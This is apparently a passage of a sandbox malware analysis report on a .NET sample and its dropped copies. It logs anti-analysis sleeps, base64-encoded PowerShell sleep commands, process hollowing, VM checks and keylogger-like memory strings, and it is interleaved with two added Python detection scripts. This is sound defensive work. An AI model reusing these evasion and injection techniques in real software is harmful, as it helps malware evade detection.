                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1196965s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1196558s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1664 | Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1200000
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1199577
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1199436
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1199296
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1199155
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1199028
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198890
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198750
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198624
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198500
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198305
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198191
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1198046
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197934
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197796
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197640
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197531
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197421
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197296
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197171
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1197027
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196889
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196774
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196671
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196548
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196390
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196281
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1196171
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195937
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195750
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195636
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195528
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195421
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195312
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195202
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1195089
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194968
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194859
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194749
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194636
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194530
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194420
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194312
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194201
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1194093
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1193984
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1193869
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1193749
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1193640
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Thread delayed: delay time: 1193530
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1199711
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1198567
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1198396
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1198009
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1196965
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Thread delayed: delay time: 1196558
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Window / User API: threadDelayed 9714
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9531
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Window / User API: threadDelayed 9473
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Window / User API: threadDelayed 9713
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Window / User API: threadDelayed 9689
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9447
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Window / User API: threadDelayed 9680
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Window / User API: threadDelayed 9658
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9268
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Window / User API: threadDelayed 525
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9118
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: Vlrvln.exe, 00000004.00000002.515947935.000000000165F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                Source: kDPmkTm.exe, 0000000B.00000002.613827375.00000000015E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: Vlrvln.exe, 00000004.00000002.515947935.000000000165F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Memory allocated: page read and write | page guard
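The sleep entries above are the raw material for the "May sleep (evasive loops)" verdict: the sandbox flags a single delay whose magnitude is at or above its 30000 threshold (the ">= -30000s" comparison; relative NT delays are printed as negative numbers) and any thread that sleeps more than 30 times. The script below is an added example, not part of the Joe Sandbox report, that parses lines in this format and applies those same thresholds per process. It assumes the figures are milliseconds even though the report suffixes them with "s": 1200000 would then be 20 minutes, and 922337203685477 is exactly Int64.MaxValue / 10^4, i.e. the largest relative timeout expressible in 100 ns ticks, which is an effectively infinite wait rather than a timed sleep. The regex also accepts the run-together form ("4128Thread sleep") that extraction produced. The sample lines are copied from this section and labelled as constructed input.

```python
"""Parse sandbox thread-sleep lines and apply the report's own thresholds:
a single delay >= 30 s, or more than 30 sleep calls on one thread.
Results are aggregated per process so the stalling pattern across the
dropper, its two copies and powershell.exe is visible at a glance."""
import re
from collections import defaultdict

# Constructed sample: lines taken from this report's evasion section.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 4128 Thread sleep time: -22136092888451448s >= -30000s",
    r"Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 3504 Thread sleep count: 9714 > 30",
    r"Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 Thread sleep time: -1200000s >= -30000s",
    r"Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 Thread sleep time: -1199577s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4324 Thread sleep count: 46 > 30",
    r"Source: C:\Users\user\Desktop\PSFBGrvmxy.exe Thread delayed: delay time: 922337203685477",
]

# Int64.MaxValue / 10_000: the largest relative timeout expressible in 100 ns
# ticks, converted to milliseconds (assumption: the report's figures are ms).
# A delay this large, or a larger overflowed one, is an effectively infinite
# wait, not a timed sleep.
INFINITE_MS = (2**63 - 1) // 10_000

# Tolerates both "TID: 4128 Thread sleep" and the fused "4128Thread sleep".
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*(?:TID:\s*(?P<tid>\d+)\s*)?"
    r"(?:Thread sleep (?P<kind>time|count):\s*(?P<val>-?\d+)"
    r"|Thread delayed: delay time:\s*(?P<delay>\d+))"
)


def summarize(lines, single_ms=30_000, max_calls=30):
    """Per-process sleep statistics plus an 'evasive' verdict."""
    per = defaultdict(lambda: {"long_sleeps": 0, "infinite_waits": 0,
                               "max_ms": 0, "busy_threads": set()})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        stats = per[m["proc"]]
        if m["kind"] == "count":
            if int(m["val"]) > max_calls:
                stats["busy_threads"].add(m["tid"])
            continue
        # The sandbox prints relative NT delays as negative numbers.
        ms = abs(int(m["delay"] if m["kind"] is None else m["val"]))
        if ms >= INFINITE_MS:
            stats["infinite_waits"] += 1
        elif ms >= single_ms:
            stats["long_sleeps"] += 1
        stats["max_ms"] = max(stats["max_ms"], ms)
    return {
        proc: {**s, "busy_threads": sorted(s["busy_threads"]),
               "evasive": bool(s["long_sleeps"] or s["infinite_waits"]
                               or s["busy_threads"])}
        for proc, s in per.items()
    }


if __name__ == "__main__":
    for proc, stats in summarize(SAMPLE_LINES).items():
        print(proc, stats)
```

Running it over the full section rather than the six sample lines gives one row per process; the thresholds are parameters so the same function can be reused against a stricter policy (for example flagging any single sleep over five minutes) without touching the parser.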

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Process created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Process created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Process created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeMemory written: C:\Users\user\Desktop\PSFBGrvmxy.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeMemory written: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeMemory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
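The two evasion patterns recorded above, an `-ENC` PowerShell launch whose only content is a 20-second sleep and the sample re-launching its own image before overwriting it at base 0x400000 with a fresh MZ header, are both visible in ordinary process-creation telemetry. The following triage script is an added example, not part of the Joe Sandbox report or of the malware; it runs over constructed records modelled on the process tree above (the base64 blob is the one from the report, the benign control record and the field names are assumptions), decodes any `-EncodedCommand` prefix form that powershell.exe accepts, and flags sleep-only payloads and self-spawns.

```python
import base64
import binascii
import re

# Constructed process-creation records modelled on the process tree in the
# report above (not sandbox output). Real sources for these fields are Sysmon
# Event ID 1 or Security 4688 with command-line auditing enabled.
SAMPLE_EVENTS = [
    {
        "parent": r"C:\Users\user\Desktop\PSFBGrvmxy.exe",
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC '
        "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==",
    },
    {   # the sample re-launching its own image (it then writes a PE at 0x400000)
        "parent": r"C:\Users\user\Desktop\PSFBGrvmxy.exe",
        "image": r"C:\Users\user\Desktop\PSFBGrvmxy.exe",
        "cmdline": r"C:\Users\user\Desktop\PSFBGrvmxy.exe",
    },
    {   # benign control record (constructed)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'powershell.exe -NoProfile -Command "Get-Process"',
    },
]

# A decoded script that does nothing but sleep (with optional arguments).
_SLEEP_ONLY = re.compile(r"^\s*(?:start-sleep|sleep)(?:\s+-?\w+)*\s*;?\s*$", re.I)


def _is_encoded_flag(token: str) -> bool:
    """powershell.exe resolves -EncodedCommand from any prefix starting at -e
    (-e, -ec, -enc, ...), case-insensitively; -ex... is -ExecutionPolicy."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name.startswith("e") and "encodedcommand".startswith(name)


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none.
    The payload is base64 of the UTF-16LE script text."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def triage_event(event: dict) -> list:
    """Findings for one process-creation record."""
    findings = []
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        findings.append(f"encoded PowerShell command: {script!r}")
        if _SLEEP_ONLY.match(script):
            findings.append("sleep-only encoded payload (delay timer, sandbox evasion)")
    # A process whose parent is its own image is the setup step of the
    # self-hollowing seen in the report ("Memory written ... base: 400000 ... 4D5A").
    if event["parent"].lower() == event["image"].lower():
        findings.append("self-spawn of own image (process hollowing candidate)")
    return findings


def triage(events) -> list:
    """(index, finding) pairs over a batch of records."""
    return [(i, f) for i, ev in enumerate(events) for f in triage_event(ev)]


if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The self-spawn check is deliberately loose: legitimate software (browsers, updaters) also launches copies of itself, so in a real pipeline it is a correlation key to join against memory-write or image-load telemetry rather than an alert on its own. The encoded-command check, by contrast, is high-signal whenever the decoded script is nothing but a timer.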
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}r{Win}r
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}r{Win}
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}{Win}r
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:11:25 AM)<br>{Win}
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Users\user\Desktop\PSFBGrvmxy.exe VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
